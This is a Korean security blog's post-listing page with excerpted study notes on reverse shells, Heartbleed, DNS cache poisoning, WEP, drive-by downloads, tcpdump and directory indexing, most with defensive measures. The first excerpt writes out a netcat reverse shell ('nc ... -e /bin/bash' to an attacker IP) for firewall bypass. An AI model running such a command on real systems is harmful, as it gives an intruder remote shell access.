본문 바로가기
  • Vetheuil in Summer

분류 전체보기115

리버스 쉘 ( Revers Shell ) 1. 개요 1)내부침입, 무작위대입, 사전공격등으로 관리자(root)계정 탈취 2)반복적 침입을 위해 일반사용자로 위장한 관리자 계정 생성 3)지속적으로 원격 접속을 통하여 악의적 행위 수행 2. 공격기법 1)외부망에서 telnet , SSH 접속불가 2)방화벽 정책에 따라 Inbound 80,443/tcp만 허용 # netcat 프로그램 방화벽 우회 * 공격자 (123.0.0.1) * 공격대상 (234.0.0.1) 1) 공격자 --> ssh 234.0.0.1 ( 방화벽 차단 ) 2) nc -lvp 80 (공격자 포트 리슨상태) 3) 공격대상 서버( nc 123.0.0.1:80 -e /bin/bash // 내부에서 외부로 접속요청 ) 4) 접속성공 ( //방화벽에서 Outbound 80 오픈상태 ) **.. 2020. 11. 23.
SSL/TLS Heart Bleed 1. 개요 1)Open SSL 라이브러리의 하트비트(Heart Beat)확장 모듈 취약점 활용 2)SSL 연결을 매번 재협상하지 않기 위해 상호간 연결 지속신호를 교환(Heart Beat) 3)클라이언트가 Payload 내용과 Payload 길이를 보내면 서버가 응답메세지를 전송 4)서버가 클라이언트의 요청 Payload 내용의 길이를 검증하지 않는 취약점 존재 5)서버의 시스템 메모리 정보가 유출될 수 있는 문제점 존재 2. 공격기법 1)공격자는 짧은 Payload 내용을 최대 Payload 길이 (64KB)로 조작하여 SSL서버로 전송 ex) Heart Beat : |'AB'|64KB| (최대) 2)취약한 버전의 SSL서버는 요청된 하트비트의 최대 Payload길이(64KB)만큼 자신의 시스템 메모리.. 2020. 11. 23.
DNS Cache Poisoning 1. 개요 1)DNS 서버는 성능 향상을 위하여 캐시 정보를 사용하여 응답 2)상위 DNS로 반복적인 질의를 줄이기 위해 응답 정보를 캐시에 일정시간 유지 2. 공격 기법 1)공격자는 조작된 도메인 질의응답 메시지를 희생자 DNS에 다량으로 전송 2)이때 Transaction ID를 모르기 때문에 랜덤하게 다수의 응답 메시지를 생성 3)조작된 응답 중 정상응답 보다 먼저 일치되는 응답이 있으면 캐시에 저장 4)다수의 희생자 DNS서버 사용자들이 조작된 주소의 웹사이트로 접속 5)개인정보나 금융정보 유출 등의 2차 피해 발생 가능 3. 대응법 1)DNS 어플리케이션을 최신 패치 상태로 유지 2)도메인 관리용 DNS서버는 재귀적 질의를 허용하지 않도록 설정 3)DNSSEC으로 질의응답 정보 암호화 적용 2020. 11. 20.
WEP (Wired Equivalent Privacy) 1. 개요 1)데이터 암호화, 사용자인증 및 무결성 체크 기능 제공 2)고정된 대칭키와 랜덤 생성된 초기벡터(IV)를 조합한 암호키 사용 3)RC4 기반의 데이터암호화 및 대칭키 기반의 인증기능 제공 2. 취약점 1)24bit 짧은 길이의 초기벡터(IV) 사용 위험 2)40/104bit 짧은 길이의 대칭키 사용 취약점 3)불안전한 RC4 암호화 알고리즘 취약점 3. 인증 문제점 1)단방향 인증방식 제공, 악의적 불법 AP피해 발생 가능 2)고정된 대칭키를 무선랜을 사용하는 모든 장비가 사용 ==> IEEE802.11i 보안표준 : WPA 1/2 2020. 11. 20.
SSL/TLS HeartBleed 1. 개요 - OpenSSL 라이브러리의 하트비트(Heart Beat)확장 모듈 취약점 활용 - SSL연결을 매번 재협상 하지 않기 위해 상호간 연결 지속 신호를 교환(HeartBeat) - 클라이언트가 PayLoad 내용과 PayLoad길이를 보내면 서버가 응답메세지를 전송 - 서버가 클라이언트의 요청 PayLoad 내용의 길이를 검증하지 않는 취약점 존재 - 서버의 시스템 메모리 정보가 유출될 수 있는 문제점 존재 2. 공격기법 - 공격자는 짧은 PayLoad내용을 최대 PayLoad길이(64KB)로 조작하여 SSL서버로 전송 ex. Heart Beat : | 'AB' | 64KB | (최대값) - 취약한 버전의 SSL서버는 요청된 하트비트의 최대 PayLoad길이(64KB)만큼 자신의 시스템 메모리.. 2020. 7. 7.
DBD ( Drive By Download ) 1. 개요 - 희생자가 자신의 의도와 무관하게 악성코드가 다운되어 설치되는 공격 - 사용자 PC의 운영체제, 인터넷 브라우저, 문서편집기/뷰어 등의 취약점 이용 - 난독화된 악성코드를 다수의 경유지와 중계지를 거쳐 최종 유포지에서 다운로드 유도 - 특정 타겟을 대상으로 하는 워터링홀(Watering Hole) 방식의 APT공격 가능 2. 구성요소 - 방문페이지(Landing Page) : 현재 브라우저에 나타나는 페이지 - 경유페이지(Passage Page) : 중계 페이지로 연결되는 악성스크립트가 삽입된 페이지 - 중계페이지(Hopping Page) : 유포페이지로 연결되는 악성코드가 저장되어 배포되는 페이지 - 유포페이지(Distribution Page) : 최종적으로 악성코드가 저장되어 배포되는 페.. 2020. 7. 7.
TCP DUMP ● Tcpdump 컴퓨터 네트워크상에 트래픽을 듣고 감시하는 네트워크 모니터링 응용프로그램으로 가장 오래된 패킷 모니터링 도구이며 전문가들에게 널리 사용되고 있는 네트워크 모니터링 도구이다. ● 사용법 tcpdump [ -AbdDefhHIJKlLnNOpqStuUvxX# ] [ -B buffer_size ] [ -c count ] [ -C file_size ] [ -E spi@ipaddr algo:secret,... ] [ -F file ] [ -G rotate_seconds ] [ -i interface ] [ --immediate-mode ] [ -j tstamp_type ] [ -m module ] [ -M secret ] [ --number ] [ --print ] [ -Q in|out|inout .. 2020. 3. 26.
웹서버 취약점 [디렉터리 인덱싱(Indexing)/리스팅(Listing)취약점 디렉터리 인덱싱 / 리스팅 취약점 : 웹 어플리케이션을 사용하고 있는 서버의 미흡한 설정으로 인해 인덱싱 기능이 활성화가 되어있을 경우, 공격자가 강제 브라우징을 통해 서버 내의 모든 드렉터리 및 파일에 대한 인덱싱이 가능하여 웹 어플리케이션 및 서버의 주요 정보가 노출될 수 있는 취약점을 말한다. # 아파치 웹서버 환경설정 파일 (httpd.conf)을 통한 디렉터리 인덱싱/리스팅 제한 Options - Indexes FollowSymLinks - 제한할 디렉터리에 Options 지시자의 Indexes 설정을 제거 한다. 제한된 디렉터리 인덱싱/리스팅 테스트 - 디렉터리 인덱싱/리스팅 공격 시 403 Forbidden(금지) 응답 메세지가 반환됨을 확인할 수 있다. # ISS/Tomcat 환경 ISS의.. 2020. 2. 7.